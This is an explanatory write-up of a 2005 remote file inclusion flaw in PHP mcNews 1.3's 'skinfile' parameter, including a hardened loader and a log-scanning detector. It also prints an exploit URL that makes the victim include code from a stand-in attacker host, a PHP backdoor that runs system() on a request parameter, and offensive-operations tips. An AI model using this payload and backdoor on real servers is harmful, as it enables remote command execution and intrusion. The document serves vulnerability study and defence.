PHP mcNews 1.3 'skinfile' Remote File Inclusion Explained

What this paper is
This paper details a vulnerability in PHP mcNews version 1.3. The vulnerability is a Remote File Inclusion (RFI) flaw, meaning an attacker can trick the web application into including and executing arbitrary code from a remote server. This is achieved by manipulating the skinfile parameter.
Simple technical breakdown
The vulnerability exists because the mcNews application doesn't properly sanitize user input for the skinfile parameter. When register_globals is enabled in the PHP configuration and allow_url_fopen is also enabled, an attacker can provide a URL to a malicious PHP script on their own server. The mcNews application will then fetch and execute this script as if it were a local file.
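To make the mechanism concrete, here is the include pattern described above next to a hardened replacement. This is an added example, not mcNews code: the skin names, the skins directory and the function names resolve_skin and load_skin are constructed for illustration.

```php
<?php
// Added example, not mcNews code: the include pattern the paper describes,
// followed by a hardened replacement. Skin names, directory and function
// names are constructed for this illustration.
declare(strict_types=1);

// Vulnerable shape (sketch only, left commented out). With register_globals=on,
// ?skinfile=... silently creates $skinfile, and with allow_url_fopen=on the
// include() below fetches "http://[hacker_box]/" and executes whatever it gets:
//
//     include($skinfile);

/** Directory holding the application's own skin files (constructed path). */
const SKIN_DIR = __DIR__ . '/skins';

/** The only skins the application knows about: request name => local file. */
const ALLOWED_SKINS = [
    'default' => 'default.php',
    'dark'    => 'dark.php',
];

/**
 * Map a user-supplied skin name to a local file, or return null if the name
 * is not on the allowlist. The input is used only as an array key, so URLs,
 * "../" sequences and wrapper prefixes never reach include().
 */
function resolve_skin(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_SKINS)) {
        return null;
    }
    return SKIN_DIR . '/' . ALLOWED_SKINS[$requested];
}

/**
 * Request handler standing in for header.php: read the parameter explicitly
 * from the query array instead of relying on register_globals, and include
 * only what resolve_skin() returns.
 */
function load_skin(array $query): string
{
    $name = $query['skinfile'] ?? 'default';
    $path = resolve_skin(is_string($name) ? $name : '');
    if ($path === null) {
        return 'rejected: unknown skin';
    }
    // In the real handler this is where `include $path;` would run.
    return 'ok: would include ' . $path;
}

// Constructed sample requests: one legitimate, three hostile.
$samples = [
    'dark',
    'http://[hacker_box]/backdoor.php',
    '../../etc/passwd',
    '',
];
foreach ($samples as $value) {
    printf("skinfile=%-36s -> %s\n", $value, load_skin(['skinfile' => $value]));
}
```

The design choice is that the request picks a name and the server picks the file; nothing the client sends is ever concatenated into a path or handed to a URL wrapper, which is what a sanitizer-based fix would still have to get right on every edge case.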
Complete code and payload walkthrough
The provided "code" is not a traditional exploit script but rather a demonstration of how to trigger the vulnerability using a crafted URL.
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/

Let's break this down:
- if register_globals=on and allow_url_fopen=on: This is a condition. The exploit will only work if these two PHP configuration settings are enabled on the victim's server.
  - register_globals=on: This PHP directive, when enabled, automatically registers request and environment variables (GET, POST, cookie, session variables) as global variables. This means a parameter like skinfile in a URL directly becomes a variable named $skinfile within the script.
  - allow_url_fopen=on: This PHP directive allows URL-like wrappers (such as http:// and ftp://) when accessing files. This is what makes including a remote file possible.
- http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/: This is the exploit URL.
  - http://[victim]/: The base URL of the vulnerable web server.
  - [dir]/mcNews/admin/header.php: The specific script within mcNews that is vulnerable. The header.php script likely includes the skinfile parameter to load a skin or template.
  - ?skinfile=: This marks the start of the query parameters; skinfile is the parameter being exploited.
  - http://[hacker_box]/: This is the URL of the attacker's server. The attacker would host a malicious PHP file (e.g., a simple backdoor or command execution script) at this location. When header.php tries to include http://[hacker_box]/, PHP, with allow_url_fopen enabled, will fetch the content from the attacker's server and execute it.
Mapping list:
- register_globals=on -> Enables direct use of URL parameters as global variables.
- allow_url_fopen=on -> Enables inclusion of remote files via URLs.
- http://[victim]/[dir]/mcNews/admin/header.php -> The vulnerable application endpoint.
- ?skinfile= -> The vulnerable parameter name.
- http://[hacker_box]/ -> The attacker-controlled remote file to be included and executed.
Payload:
The "payload" in this context is the content of the PHP file hosted on [hacker_box]. A common payload for RFI would be a simple PHP backdoor that allows command execution. For example, a file named backdoor.php on [hacker_box] could contain:
<?php
// Simple command execution backdoor
if (isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
}
?>
When the victim's server includes this file via skinfile, the attacker could then send requests like:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/backdoor.php&cmd=ls -la
This would execute ls -la on the victim's server and display the output.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the victim's system itself. The attack targets the web application's interaction with the server's PHP configuration.
- Lab Preconditions:
  - A controlled attacker server ([hacker_box]) capable of hosting PHP files and serving them over HTTP.
  - A vulnerable mcNews 1.3 installation on a target web server.
  - The target web server must have register_globals and allow_url_fopen enabled in its PHP configuration. This is the most critical prerequisite.
- Tooling Assumptions:
  - A web browser for crafting and sending exploit URLs.
  - A simple HTTP server (e.g., Python's SimpleHTTPServer, Apache, Nginx) for hosting the payload on the attacker's machine.
  - A text editor for creating the payload PHP file.
- Execution Pitfalls:
  - PHP Configuration: If register_globals or allow_url_fopen is disabled, the exploit will not work. Modern PHP versions have these settings disabled by default for security reasons.
  - Firewall/Network Restrictions: The victim's server might be configured to prevent outbound HTTP connections to arbitrary external IPs, blocking the inclusion of the remote file.
  - Input Validation (if patched): Even if register_globals and allow_url_fopen are on, subsequent versions or patches of mcNews might have added input validation for skinfile.
  - Payload Location: The attacker needs to ensure their payload is accessible and correctly formatted.
  - URL Encoding: Special characters in the cmd parameter (if used for command execution) might need URL encoding.
Where this was used and when
This vulnerability was published in March 2005. Exploits of this nature were common in the mid-2000s when PHP web applications were widely deployed, and security configurations like register_globals were often left enabled for ease of development. It would have been used against any web server running mcNews 1.3 with the vulnerable PHP configuration.
Defensive lessons for modern teams
- Disable register_globals: This is a fundamental security best practice; the directive has been deprecated and removed in modern PHP versions. Never enable it.
- Disable allow_url_fopen (or restrict it): While sometimes necessary for legitimate functionality, allow_url_fopen significantly increases the risk of RFI. If it must be enabled, implement strict input validation and keep allow_url_include disabled; that directive is off by default and separately controls whether include and require accept URLs, which gives more granular control.
- Input Validation is Key: Always validate and sanitize all user-supplied input, especially parameters used in file operations or external requests. Treat all external input as untrusted.
- Keep Software Updated: Ensure all web applications and their dependencies are kept up-to-date to patch known vulnerabilities.
- Web Application Firewalls (WAFs): A WAF can help detect and block common RFI patterns in HTTP requests.
- Network Segmentation and Egress Filtering: Restrict outbound network connections from web servers to only necessary destinations.
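The WAF and monitoring advice above is easier to act on with a concrete pattern. As an added example that is not part of the paper, the following PHP script scans Apache-style access-log lines for a query-string value that is itself a URL, which is exactly the shape of the skinfile request discussed above; it also decodes percent-encoded values so an encoded scheme is caught. The log lines, client IPs and the hacker-box.example hostname are constructed, and find_rfi_attempts is a name chosen here.

```php
<?php
declare(strict_types=1);

// Added example, not part of the paper: scan web-server access-log lines for
// the RFI shape described above, i.e. a query-string value that is itself a
// URL. All log lines, IPs and hostnames below are constructed for the example.

const LOG_LINES = [
    '198.51.100.7 - - [07/Mar/2005:10:12:01 +0000] "GET /news/mcNews/admin/header.php?skinfile=default HTTP/1.1" 200 2310',
    '198.51.100.8 - - [07/Mar/2005:10:12:44 +0000] "GET /news/mcNews/admin/header.php?skinfile=http://hacker-box.example/ HTTP/1.1" 200 512',
    '198.51.100.8 - - [07/Mar/2005:10:13:02 +0000] "GET /news/mcNews/admin/header.php?skinfile=http%3A%2F%2Fhacker-box.example%2Fbackdoor.php&cmd=ls+-la HTTP/1.1" 200 1840',
    '203.0.113.5 - - [07/Mar/2005:10:14:10 +0000] "GET /news/mcNews/index.php?page=2 HTTP/1.1" 200 6021',
];

/** Schemes that turn an include() into a remote fetch or a code stream. */
const REMOTE_SCHEME = '#^(?:https?|ftps?|php|data|expect)://#i';

/**
 * Return one finding per request whose query string carries a URL-shaped
 * parameter value. Each finding records client IP, path and the offending
 * parameter so an analyst can pivot on any of them.
 */
function find_rfi_attempts(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        // Pull the client IP and request target out of a combined-log line.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $ip     = $m[1];
        $target = $m[2];
        $query  = parse_url($target, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        // parse_str() decodes %XX sequences, so encoded schemes are caught too.
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match(REMOTE_SCHEME, $value)) {
                $findings[] = [
                    'ip'    => $ip,
                    'path'  => parse_url($target, PHP_URL_PATH),
                    'param' => (string) $name,
                    'value' => $value,
                ];
            }
        }
    }
    return $findings;
}

// Two of the four constructed lines should be reported.
foreach (find_rfi_attempts(LOG_LINES) as $f) {
    printf("%s %s %s=%s\n", $f['ip'], $f['path'], $f['param'], $f['value']);
}
```

The check keys on the value, not the parameter name, so it also flags RFI attempts against parameters other than skinfile; pair it with egress filtering on the web tier so a hit in the log corresponds to a blocked fetch rather than an executed payload.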
ASCII visual (if applicable)
+-----------------+      +-----------------+      +--------------------+
| Attacker Server |----->| Victim Web      |----->| PHP Interpreter    |
| (hacker_box)    |      | Server          |      | (on victim)        |
| - Payload.php   |      | - mcNews/admin/ |      | - allow_url_fopen  |
+-----------------+      |   header.php    |      | - register_globals |
                         | - ?skinfile=URL |      +--------------------+
                         +-----------------+
                                  ^
                                  |
                                  | (Exploit URL)
                                  |
+-----------------+      +-----------------+
| Attacker Client |----->| Victim Web      |
| (Browser)       |      | Server          |
+-----------------+      +-----------------+
Explanation:
The attacker's client crafts an HTTP request. This request targets the vulnerable header.php script on the victim's web server, passing a URL to the attacker's payload via the skinfile parameter. The PHP interpreter on the victim's server, with allow_url_fopen and register_globals enabled, interprets the skinfile parameter as a remote file path, fetches the Payload.php from the attacker's server, and executes its contents.
Source references
- Paper ID: 865
- Paper Title: PHP mcNews 1.3 - 'skinfile' Remote File Inclusion
- Author: Filip Groszynski
- Published: 2005-03-07
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/865
- Raw URL: https://www.exploit-db.com/raw/865
Original Exploit-DB Content (Verbatim)
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/
# milw0rm.com [2005-03-07]